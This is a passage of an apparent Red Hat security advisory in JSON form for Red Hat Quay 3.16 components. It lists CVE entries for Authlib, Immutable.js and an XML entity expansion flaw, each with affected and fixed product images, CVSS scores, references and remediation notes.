          "summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
          "url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
        },
        {
          "category": "external",
          "summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
          "url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
        },
        {
          "category": "external",
          "summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
          "url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
        }
      ],
      "release_date": "2026-03-06T06:44:26.402000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
    },
    {
      "cve": "CVE-2026-29063",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-03-06T19:00:57.982727+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445291"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445291",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
          "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
        },
        {
          "category": "external",
          "summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
          "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
        }
      ],
      "release_date": "2026-03-06T18:25:22.438000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-29074",
      "cwe": {
        "id": "CWE-776",
        "name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
      },
      "discovery_date": "2026-03-06T00:00:00+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
